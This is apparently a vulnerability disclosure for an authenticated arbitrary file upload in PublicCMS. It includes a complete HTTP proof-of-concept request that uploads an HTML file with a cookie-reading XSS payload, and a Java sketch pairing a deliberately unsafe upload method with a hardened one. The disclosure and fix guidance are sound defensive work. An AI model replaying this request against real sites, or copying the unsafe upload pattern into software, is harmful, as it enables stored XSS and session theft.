Vulnerability Product: PublicCMS
Vulnerability version: <= V4.0.202302.e
Vulnerability type: File Upload
Vulnerability Details:
1. Locate com.publiccms.controller.admin.cms.CmsWebFileAdminController#upload. The handler concatenates the user-supplied file name directly into the target path when handling the upload, without any filtering of the name or its extension.
![Image description](https://foruda.gitee.com/images/1720065890536771121/7fb0a88b_13737655.png "Screenshot")
2. Follow the call into com.publiccms.common.tools.CmsFileUtils#upload. After reading the uploaded file name and content, the file is written to disk as-is, again without any validation. An authenticated admin can therefore upload a file of arbitrary name and content under the web-file directory, i.e. an arbitrary file upload vulnerability.
![Image description](https://foruda.gitee.com/images/1720065923216427939/b36d6f43_13737655.png "Screenshot")
3. Construct the POC. It can only be triggered after logging in to the admin backend; replace the Cookie and _csrf values with your own session's. The file part declares Content-Type: image/jpeg while carrying an .html file name, which the server does not check. When replaying the request, let your tool recompute Content-Length if you change the body.
```
POST /admin/cmsWebFile/doUpload HTTP/1.1
Host: localhost:8080
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarynfg1WTfJA3IT8Ekc
Cookie: iwSID=a034c2ae-fefa-4483-941f-9d50f228c941; PUBLICCMS_ANALYTICS_ID=dfa77a63-31c7-484e-8f81-3770b770500b; PUBLICCMS_ADMIN=1_e0bf3e95-ae30-47b7-87f2-296e79ea7c00; JSESSIONID=6C4304D314A09443F51A7F87B4A4C765
Connection: close
Content-Length: 738

------WebKitFormBoundarynfg1WTfJA3IT8Ekc
Content-Disposition: form-data; name="_csrf"

e0bf3e95-ae30-47b7-87f2-296e79ea7c00
------WebKitFormBoundarynfg1WTfJA3IT8Ekc
Content-Disposition: form-data; name="path"


------WebKitFormBoundarynfg1WTfJA3IT8Ekc
Content-Disposition: form-data; name="files"; filename="dotest.html"
Content-Type: image/jpeg

<img src=1 onerror=alert(document.cookie)>
------WebKitFormBoundarynfg1WTfJA3IT8Ekc
Content-Disposition: form-data; name="overwrite"

on
------WebKitFormBoundarynfg1WTfJA3IT8Ekc
Content-Disposition: form-data; name="encoding"

utf-8
------WebKitFormBoundarynfg1WTfJA3IT8Ekc
Content-Disposition: form-data; name="ajax"

1
------WebKitFormBoundarynfg1WTfJA3IT8Ekc--
```
![Image description](https://foruda.gitee.com/images/1720065981318599039/3968c028_13737655.png "Screenshot")
4. Request the uploaded file under /webfile/. The HTML is served as-is and the payload runs in the browser:
```
http://localhost:8080/webfile/dotest.html
```
![Image description](https://foruda.gitee.com/images/1720066011708109942/c9babb29_13737655.png "Screenshot")
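The following is an added example and is not PublicCMS's code. `uploadUnsafe()` sketches the pattern steps 1 and 2 describe (caller-controlled `path` and file name joined straight into the target path and written to disk), and `uploadSafe()` shows the checks a fixed handler needs: reject separators, traversal and NUL bytes in the name, allow-list the extension so an `.html` such as `dotest.html` can no longer be served from `/webfile/`, and confirm the normalised target still lies under the upload root. The class name, the root directory and the extension allow-list are assumptions for the demo, not PublicCMS's values.

```java
import java.io.ByteArrayInputStream;
import java.io.IOException;
import java.io.InputStream;
import java.nio.charset.StandardCharsets;
import java.nio.file.Files;
import java.nio.file.Path;
import java.nio.file.StandardCopyOption;
import java.util.Locale;
import java.util.Set;

/**
 * Added example, not PublicCMS code. uploadUnsafe() mirrors the pattern the report
 * describes; uploadSafe() is a hardened counterpart. Root directory and allow-list
 * are assumptions for the demo.
 */
public final class SafeWebFileUpload {

    // Assumed allow-list for a "web file" upload. HTML is deliberately absent:
    // an uploaded .html served from /webfile/ is exactly the stored XSS in the PoC.
    private static final Set<String> ALLOWED_EXTENSIONS =
            Set.of("css", "js", "png", "jpg", "jpeg", "gif", "svg", "txt", "woff2");

    private final Path root;

    public SafeWebFileUpload(Path root) {
        this.root = root.toAbsolutePath().normalize();
    }

    /** Unsafe: whatever is in path and fileName decides where the bytes land. */
    public Path uploadUnsafe(String path, String fileName, InputStream content) throws IOException {
        Path target = root.resolve(path).resolve(fileName);   // "../" and absolute paths pass through
        Files.createDirectories(target.getParent());
        Files.copy(content, target, StandardCopyOption.REPLACE_EXISTING);
        return target;
    }

    /** Hardened: single path element, allow-listed extension, target confined to root. */
    public Path uploadSafe(String path, String originalName, InputStream content) throws IOException {
        // 1. The file name must be one path element with no separators or NUL byte.
        if (originalName == null || originalName.isEmpty() || originalName.indexOf('\0') >= 0
                || originalName.contains("/") || originalName.contains("\\")
                || originalName.equals(".") || originalName.equals("..")) {
            throw new IllegalArgumentException("invalid file name");
        }
        // 2. Extension allow-list, compared case-insensitively so ".HTML" cannot slip through.
        int dot = originalName.lastIndexOf('.');
        String ext = dot < 0 ? "" : originalName.substring(dot + 1).toLowerCase(Locale.ROOT);
        if (!ALLOWED_EXTENSIONS.contains(ext)) {
            throw new IllegalArgumentException("extension not allowed: " + ext);
        }
        // 3. Resolve the target directory and verify it is still under root after normalisation.
        //    This catches "../" segments in path and absolute paths (resolve() returns those unchanged).
        Path dir = root.resolve(path == null ? "" : path).normalize();
        if (!dir.startsWith(root)) {
            throw new IllegalArgumentException("path escapes upload root");
        }
        Path target = dir.resolve(originalName).normalize();
        if (!target.startsWith(root)) {   // belt and braces; step 1 already excludes separators
            throw new IllegalArgumentException("file name escapes upload root");
        }
        Files.createDirectories(dir);
        Files.copy(content, target, StandardCopyOption.REPLACE_EXISTING);
        return target;
    }

    public static void main(String[] args) throws IOException {
        Path demoRoot = Files.createTempDirectory("webfile-demo");   // stand-in for the web-file directory
        SafeWebFileUpload uploader = new SafeWebFileUpload(demoRoot);
        byte[] payload = "<img src=1 onerror=alert(document.cookie)>".getBytes(StandardCharsets.UTF_8);

        // The report's PoC: an .html file with an empty path. The unsafe method accepts it.
        Path written = uploader.uploadUnsafe("", "dotest.html", new ByteArrayInputStream(payload));
        System.out.println("unsafe wrote:  " + written);

        // Same PoC, a traversal attempt and a benign upload against the hardened method.
        String[][] attempts = { {"", "dotest.html"}, {"../../outside", "ok.txt"}, {"", "logo.PNG"} };
        for (String[] a : attempts) {
            try {
                Path p = uploader.uploadSafe(a[0], a[1], new ByteArrayInputStream(payload));
                System.out.println("safe wrote:    " + p);
            } catch (IllegalArgumentException e) {
                System.out.println("safe rejected  " + a[0] + "/" + a[1] + ": " + e.getMessage());
            }
        }
    }
}
```

Of the three attempts in `main`, only `logo.PNG` is written by `uploadSafe()`; `dotest.html` fails the extension check and the `../../outside` path fails the root-containment check. An extension allow-list alone is not a complete fix for a web-file directory that is served directly: files that the container executes or that browsers render as active content must stay off the list, and the real upstream fix should be reviewed rather than inferred from this sketch.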